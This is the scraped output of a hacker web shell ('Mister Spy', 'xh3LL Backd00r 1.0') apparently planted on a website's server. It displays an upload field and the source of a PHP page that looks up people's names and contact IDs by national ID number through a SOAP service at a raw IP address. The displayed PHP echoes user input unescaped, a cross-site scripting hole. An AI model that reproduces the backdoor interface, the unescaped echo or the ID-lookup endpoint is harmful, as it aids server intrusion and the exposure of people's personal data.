Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/espanol/
Upload File :
Current File : /home/caballoscriollos/public_html/espanol/webservice.php

<?php
$client = new SoapClient("http://190.12.103.166/accc/ws/accc.asmx?WSDL");

$Dni = $_REQUEST['Dni'];
if ($Dni)
{
	$id = $client->Get_IdContacto2DNI(array('sDNI' => $Dni));
	$nombre = $client->Get_Nombre2DNI(array('sDNI' => $Dni));
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/base_espanol.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
</head>

<body>
<form method="post">
	<label for="Dni">Dni</label>
	<input type="text" id="Dni" name="Dni" value="<?= $Dni ?>" />
	<input type="submit" value="Enviar" />
	
</form>
<br />
<div class="resultado">
	<label>Nombre: <?= $nombre->Get_Nombre2DNIResult ?></label>
	<br>
	<label>Id: <?= $id->Get_IdContacto2DNIResult ?></label>
</div>
</body>
<!-- InstanceEnd --></html>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat